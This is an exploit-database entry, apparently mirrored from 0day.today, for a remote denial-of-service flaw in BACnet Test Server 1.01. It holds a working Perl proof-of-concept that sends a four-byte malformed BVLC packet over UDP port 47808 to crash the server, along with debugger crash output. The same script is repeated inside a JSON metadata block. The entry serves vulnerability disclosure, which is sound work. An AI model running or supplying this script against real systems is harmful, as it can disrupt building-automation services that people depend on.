Search...

BACnet Test Server 1.01 - Remote Denial of Service Exploit

2020-10-07T00:00:00

ID 1337DAY-ID-35011
Type zdt
Reporter LiquidWorm
Modified 2020-10-07T00:00:00

Description

                                        
                                            # Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC)
# Author: LiquidWorm
# Vendor: https://www.bac-test.com
# Product link: https://sourceforge.com/projects/bacnetserver
# CVE: N/A


#!/usr/bin/perl
#
# BACnet Test Server 1.01 Remote Denial of Service Exploit
#
# 
# Vendor: BACnet Interoperability Test Services, Inc.
# Product web page: https://www.bac-test.com
#                   https://sourceforge.com/projects/bacnetserver
# Affected version: 1.01 (BACnet Stack Version 0.5.7)
#
# Summary: This is a simple BACnet Server aimed at developers who
# want to explore or test their BACnet Client implementations of
# the ASHRAE BACnet protocol. It is based on Steve Karg's fine
# implementation of the BACnet Stack.
#
# Desc: The BACNet Test Server is vulnerable to a denial of service
# (DoS) vulnerability when sending malformed BVLC Length UDP packet
# to port 47808 causing the application to crash.
#
# Type - 0x81
# BVLC Function
# - 0x01 - Write Broadcast Distribution Table
# - 0x02 - Read Broadcast Distribution Table
# - 0x03 - Read Broadcast Distribution Table ACK
# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header
# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds
# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.
#   Optional Originating Device IP address and Port NOT included in BVLL header.
# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.
# - 0x0c - Secure-BVLL
# - BVLL Length
# - IP address of Originating Device - optional depending on BVLC Function Code
# - Port number of Originating Device - optional depending on BVLC Function Code
# - NPDU - Network Layer Protocol Data Unit
#
# =================================================================
# (67c.2f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe
# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00
# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0         nv up ei pl nz ac pe nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
# Server+0x34313:
# 00994313 8810            mov     byte ptr [eax],dl          ds:002b:00600000=?? 
# 0:000&gt; d 994313 +77
# 0099438a cccccccc
# 0099438e cccccccc
# 00994392 cccccccc
# 00994396 cccccccc
# 0099439a cccccccc
# 0:000&gt; d esp
# 005fec04 005ff3f8
# 005fec08 005ff408
# 005fec0c 00692000
# 005fec10 cccccccc
# 005fec14 cccccccc
# 004fec18 cccccccc
# =================================================================
#
# Tested on: Microsoft Windows 10 Professional (EN)
#            Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5597
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php
#
#
# 05.08.2019
#

use strict;
use warnings;
use IO::Socket::INET;

my $target = "10.0.99.34";
my $porta = 47808;
my $proto = "udp";
my $stype = SOCK_DGRAM;
my $timeout = 1;

my $socket = new IO::Socket::INET (
PeerHost =&gt; $target,
PeerPort =&gt; $porta,
Proto =&gt; $proto,
Type =&gt; $stype,
Timeout =&gt; $timeout
) or die "Socket error. : $!\n";

print "Connected to: $target:$porta\n";

$| = 1;
binmode $socket;

my $data = "\x81\x09\xFF\xFE";

print "Sending: $data [ ".length($data)." bytes ]\n";
send ($socket, $data, 0) or die "Nope: $!\n";
print "Done.\n";

$socket-&gt;close();

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-35011", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "BACnet Test Server 1.01 - Remote Denial of Service Exploit", "description": "", "published": "2020-10-07T00:00:00", "modified": "2020-10-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/35011", "reporter": "LiquidWorm", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-27T13:47:36", "viewCount": 1, "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "zeroscience", "idList": ["ZSL-2020-5597"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/35011", "sourceData": "# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC)\n# Author: LiquidWorm\n# Vendor: https://www.bac-test.com\n# Product link: https://sourceforge.com/projects/bacnetserver\n# CVE: N/A\n\n\n#!/usr/bin/perl\n#\n# BACnet Test Server 1.01 Remote Denial of Service Exploit\n#\n# \n# Vendor: BACnet Interoperability Test Services, Inc.\n# Product web page: https://www.bac-test.com\n# https://sourceforge.com/projects/bacnetserver\n# Affected version: 1.01 (BACnet Stack Version 0.5.7)\n#\n# Summary: This is a simple BACnet Server aimed at developers who\n# want to explore or test their BACnet Client implementations of\n# the ASHRAE BACnet protocol. It is based on Steve Karg's fine\n# implementation of the BACnet Stack.\n#\n# Desc: The BACNet Test Server is vulnerable to a denial of service\n# (DoS) vulnerability when sending malformed BVLC Length UDP packet\n# to port 47808 causing the application to crash.\n#\n# Type - 0x81\n# BVLC Function\n# - 0x01 - Write Broadcast Distribution Table\n# - 0x02 - Read Broadcast Distribution Table\n# - 0x03 - Read Broadcast Distribution Table ACK\n# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header\n# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds\n# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.\n# Optional Originating Device IP address and Port NOT included in BVLL header.\n# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.\n# - 0x0c - Secure-BVLL\n# - BVLL Length\n# - IP address of Originating Device - optional depending on BVLC Function Code\n# - Port number of Originating Device - optional depending on BVLC Function Code\n# - NPDU - Network Layer Protocol Data Unit\n#\n# =================================================================\n# (67c.2f34): Access violation - code c0000005 (first chance)\n# First chance exceptions are reported before any exception handling.\n# This exception may be expected and handled.\n# *** WARNING: Unable to verify checksum for C:\\Program Files (x86)\\BACnet Interoperability Testing Services, Inc\\BACnet Server\\Server.exe\n# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00\n# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216\n# Server+0x34313:\n# 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=?? \n# 0:000> d 994313 +77\n# 0099438a cccccccc\n# 0099438e cccccccc\n# 00994392 cccccccc\n# 00994396 cccccccc\n# 0099439a cccccccc\n# 0:000> d esp\n# 005fec04 005ff3f8\n# 005fec08 005ff408\n# 005fec0c 00692000\n# 005fec10 cccccccc\n# 005fec14 cccccccc\n# 004fec18 cccccccc\n# =================================================================\n#\n# Tested on: Microsoft Windows 10 Professional (EN)\n# Microsoft Windows 7 Professional SP1 (EN)\n#\n#\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n# @zeroscience\n#\n#\n# Advisory ID: ZSL-2020-5597\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php\n#\n#\n# 05.08.2019\n#\n\nuse strict;\nuse warnings;\nuse IO::Socket::INET;\n\nmy $target = \"10.0.99.34\";\nmy $porta = 47808;\nmy $proto = \"udp\";\nmy $stype = SOCK_DGRAM;\nmy $timeout = 1;\n\nmy $socket = new IO::Socket::INET (\nPeerHost => $target,\nPeerPort => $porta,\nProto => $proto,\nType => $stype,\nTimeout => $timeout\n) or die \"Socket error. : $!\\n\";\n\nprint \"Connected to: $target:$porta\\n\";\n\n$| = 1;\nbinmode $socket;\n\nmy $data = \"\\x81\\x09\\xFF\\xFE\";\n\nprint \"Sending: $data [ \".length($data).\" bytes ]\\n\";\nsend ($socket, $data, 0) or die \"Nope: $!\\n\";\nprint \"Done.\\n\";\n\n$socket->close();\n", "category": "dos / poc", "verified": true, "_state": {"dependencies": 1647589307, "score": 0}}